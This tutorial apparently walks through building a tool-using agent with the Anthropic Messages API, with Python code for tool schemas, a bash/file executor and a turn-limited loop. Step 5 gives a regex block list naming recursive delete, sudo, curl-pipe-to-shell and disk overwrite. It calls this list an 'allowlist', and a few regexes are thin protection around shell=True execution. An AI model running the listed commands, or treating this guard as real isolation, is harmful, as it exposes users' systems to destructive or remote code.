Claude Code custom agent with tool use lets you wire real capabilities — bash execution, file I/O, web search — directly into an autonomous loop that calls tools, inspects results, and decides what to do next.

This isn't just prompting. You're building a proper agentic system where the model drives execution.

You'll learn:

How to define tools with the Anthropic Messages API tools parameter
How to implement the agentic loop that handles tool_use and tool_result turns
How to give your agent bash, file read/write, and search capabilities safely
How to stop runaway loops with turn limits and error handling

Time: 25 min | Difficulty: Intermediate

Why Tool Use Changes What Claude Code Can Do

Out of the box, Claude Code reasons and writes. Add tool use and it acts.

The pattern is simple: you describe tools in JSON schema, Claude returns a tool_use block when it wants to call one, you execute it, feed back a tool_result, and repeat. The model keeps control of what to call and when to stop.

This is exactly how Claude Code's internal agent loop works — the same mechanic you're about to build yourself.

Without tool use:

User prompt → Claude response → done

With tool use (agentic loop):

User prompt → Claude thinks → tool_use → you execute → tool_result → Claude thinks → ... → final text response

Claude Code custom agent tool use agentic loop architecture The agentic loop: Claude requests a tool, your executor runs it, the result feeds back — until Claude stops.

Prerequisites

Python 3.12+
anthropic SDK 0.25+
Anthropic API key (starts at $3/million input tokens for claude-sonnet-4-20250514; billed in USD)

pip install anthropic --upgrade
export ANTHROPIC_API_KEY="sk-ant-..."

Verify the SDK version:

python -c "import anthropic; print(anthropic.__version__)"
# 0.25.0 or higher

Step 1: Define Your Tools

Each tool is a JSON schema object. The input_schema tells Claude exactly what parameters to pass.

# tools.py
TOOLS = [
    {
        "name": "bash",
        "description": (
            "Run a shell command and return stdout + stderr. "
            "Use for file listing, git operations, running tests, or any CLI task. "
            "Do NOT use for file reads — use read_file instead."
        ),
        "input_schema": {
            "type": "object",
            "properties": {
                "command": {
                    "type": "string",
                    "description": "The shell command to execute.",
                }
            },
            "required": ["command"],
        },
    },
    {
        "name": "read_file",
        "description": "Read the full contents of a file by path. Returns the text as a string.",
        "input_schema": {
            "type": "object",
            "properties": {
                "path": {
                    "type": "string",
                    "description": "Absolute or relative path to the file.",
                }
            },
            "required": ["path"],
        },
    },
    {
        "name": "write_file",
        "description": "Write or overwrite a file with the given content.",
        "input_schema": {
            "type": "object",
            "properties": {
                "path": {
                    "type": "string",
                    "description": "Path where the file will be written.",
                },
                "content": {
                    "type": "string",
                    "description": "Full file content to write.",
                },
            },
            "required": ["path", "content"],
        },
    },
]

Why separate read_file from bash? Bash is stateful and can fail silently. A dedicated read tool returns clean errors and never accidentally executes anything.

Step 2: Implement the Tool Executor

This is the function that maps tool names to real Python code. Claude never runs code itself — you run it and pass back the result.

# executor.py
import subprocess
from pathlib import Path


def execute_tool(name: str, tool_input: dict) -> str:
    """Run the tool Claude requested and return a string result."""

    if name == "bash":
        return _run_bash(tool_input["command"])

    if name == "read_file":
        return _read_file(tool_input["path"])

    if name == "write_file":
        return _write_file(tool_input["path"], tool_input["content"])

    return f"ERROR: Unknown tool '{name}'"


def _run_bash(command: str) -> str:
    # timeout=30 prevents infinite loops from locking up your agent
    result = subprocess.run(
        command,
        shell=True,
        capture_output=True,
        text=True,
        timeout=30,
    )
    output = result.stdout
    if result.stderr:
        output += f"\n[stderr]\n{result.stderr}"
    if result.returncode != 0:
        output += f"\n[exit code: {result.returncode}]"
    return output or "(no output)"


def _read_file(path: str) -> str:
    try:
        return Path(path).read_text(encoding="utf-8")
    except FileNotFoundError:
        return f"ERROR: File not found: {path}"
    except Exception as e:
        return f"ERROR: {e}"


def _write_file(path: str, content: str) -> str:
    try:
        p = Path(path)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(content, encoding="utf-8")
        return f"OK: wrote {len(content)} chars to {path}"
    except Exception as e:
        return f"ERROR: {e}"

Step 3: Build the Agentic Loop

This is the core. The loop keeps calling Claude until it returns a plain text response with no tool_use blocks — meaning it's done.

# agent.py
import anthropic
from tools import TOOLS
from executor import execute_tool

client = anthropic.Anthropic()

MAX_TURNS = 20  # Hard stop — prevents runaway billing on stuck loops


def run_agent(user_prompt: str, system: str = "") -> str:
    """
    Run the full agentic loop for a single task.
    Returns Claude's final text response.
    """
    messages = [{"role": "user", "content": user_prompt}]

    for turn in range(MAX_TURNS):
        response = client.messages.create(
            model="claude-sonnet-4-20250514",
            max_tokens=4096,
            system=system,
            tools=TOOLS,
            messages=messages,
        )

        print(f"[turn {turn + 1}] stop_reason={response.stop_reason}")

        # Append Claude's full response to history
        messages.append({"role": "assistant", "content": response.content})

        if response.stop_reason == "end_turn":
            # No tool calls — Claude is done. Extract and return the text.
            return _extract_text(response.content)

        if response.stop_reason == "tool_use":
            # Process every tool call in this response
            tool_results = []
            for block in response.content:
                if block.type == "tool_use":
                    print(f"  → calling tool: {block.name}({block.input})")
                    result = execute_tool(block.name, block.input)
                    print(f"  ← result: {result[:120]}...")

                    tool_results.append({
                        "type": "tool_result",
                        "tool_use_id": block.id,
                        "content": result,
                    })

            # Feed all results back in a single user turn
            messages.append({"role": "user", "content": tool_results})

        else:
            # max_tokens or other stop — return whatever text we have
            return _extract_text(response.content)

    return "ERROR: MAX_TURNS reached without a final response."


def _extract_text(content: list) -> str:
    return "\n".join(
        block.text for block in content if hasattr(block, "text")
    )

Why MAX_TURNS = 20? A misbehaving tool (empty output, wrong format) can send Claude into a loop. At $3/million input tokens this adds up fast. Twenty turns covers even deep multi-file refactors.

Step 4: Run Your Agent

Wire it up with a real task:

# main.py
from agent import run_agent

SYSTEM = """
You are a precise coding agent. When asked to make changes:
1. Read the relevant files first.
2. Write the updated files.
3. Run tests to verify.
4. Report what you changed and the test result.
Never skip reading before writing.
"""

task = """
Read src/utils.py. Add a function `clamp(value, min_val, max_val)`
that clamps a number between min and max. Write the updated file.
Then run: python -m pytest tests/test_utils.py -v
"""

result = run_agent(task, system=SYSTEM)
print("\n=== Agent Result ===")
print(result)

Expected output:

[turn 1] stop_reason=tool_use
  → calling tool: read_file({'path': 'src/utils.py'})
  ← result: # utils.py...
[turn 2] stop_reason=tool_use
  → calling tool: write_file({'path': 'src/utils.py', ...})
  ← result: OK: wrote 312 chars to src/utils.py...
[turn 3] stop_reason=tool_use
  → calling tool: bash({'command': 'python -m pytest tests/test_utils.py -v'})
  ← result: PASSED tests/test_utils.py::test_clamp ...
[turn 4] stop_reason=end_turn

=== Agent Result ===
Added `clamp(value, min_val, max_val)` to src/utils.py. All 3 pytest tests pass.

Step 5: Add a Sandbox Guard (Production)

Before shipping, add an allowlist so bash can't run destructive commands.

import re

BLOCKED_PATTERNS = [
    r"\brm\s+-rf\b",       # Recursive delete
    r"\bsudo\b",           # Privilege escalation
    r"\bcurl\b.*\|\s*sh",  # Pipe-to-shell downloads
    r"\bdd\b.*of=/dev/",   # Disk overwrite
]


def _run_bash(command: str) -> str:
    for pattern in BLOCKED_PATTERNS:
        if re.search(pattern, command):
            return f"BLOCKED: command matches unsafe pattern '{pattern}'"

    result = subprocess.run(
        command, shell=True, capture_output=True, text=True, timeout=30
    )
    # ... rest of implementation

For production deployments on AWS (us-east-1 is recommended for lowest Anthropic API latency from the US), run the agent inside a Docker container with --read-only and a mounted /workspace volume. This gives you filesystem isolation without a full VM.

Verification

After completing the steps above, run this smoke test:

# smoke_test.py
from agent import run_agent

result = run_agent("Create a file /tmp/hello.txt with content 'agent works'. Then read it back and confirm.")
assert "agent works" in result, f"Unexpected result: {result}"
print("✅ Smoke test passed:", result)

You should see: ✅ Smoke test passed: The file /tmp/hello.txt contains 'agent works'.

Tool Use vs. Raw Prompting vs. OpenAI Function Calling

	Claude Tool Use	Raw Prompting	OpenAI Function Calling
Structured tool calls	✅ Typed JSON schema	❌ Fragile parsing	✅ Typed JSON schema
Multi-tool per turn	✅ Parallel blocks	❌	✅ Parallel
Token cost (input)	$3/M (Sonnet)	Same	$2.50/M (GPT-4o)
Streaming tool calls	✅	N/A	✅
Computer use built-in	✅ (`computer` tool)	❌	❌

Claude's tool_use blocks are typed Python objects on the SDK side (block.type == "tool_use", block.id, block.input). You don't parse strings — the SDK does the deserialization.

What You Learned

The Anthropic Messages API tools parameter accepts JSON schema tool definitions — Claude decides when and how to call them.
The agentic loop alternates between tool_use (you execute) and end_turn (Claude is done); always append both Claude's response and your tool_result to message history.
MAX_TURNS is not optional in production — it prevents infinite loops from unexpected tool output.
Sandbox your bash tool with a blocklist before deploying to any shared or cloud environment.

Tested on anthropic SDK 0.25, Python 3.12, macOS Sequoia 15.3 & Ubuntu 24.04

FAQ

Q: Can I run multiple tools in parallel in a single turn? A: Yes. Claude may return multiple tool_use blocks in one response. The loop above already handles this — it iterates all blocks and collects all tool_result entries before sending a single user turn back.

Q: What happens if a tool returns an error string? A: Pass the error string as the tool_result content. Claude reads it and typically retries with a corrected call or explains why it can't proceed. Never raise a Python exception — that breaks the loop.

Q: Does this work with claude-haiku-4-5 for lower cost? A: Yes. Swap claude-sonnet-4-20250514 for claude-haiku-4-5-20251001. Haiku costs $0.80/million input tokens but handles fewer parallel tool calls reliably. Use it for simpler single-tool tasks.

Q: What is the maximum number of tools I can define? A: The API supports up to 64 tool definitions per request. In practice, keep it under 10 — large tool lists inflate the system prompt and push you toward the context window limit faster.

Q: Can I give the agent memory across tasks? A: Not natively. Serialize messages to JSON after each run and reload them as conversation history on the next call. For persistent memory at scale, write key facts to a file and have the agent read it at the start of every session via read_file.